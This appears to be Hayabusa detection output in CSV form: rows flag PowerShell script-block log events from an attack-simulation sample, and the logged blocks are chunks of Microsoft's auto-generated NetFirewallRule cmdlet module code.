($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' -Alias '*' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 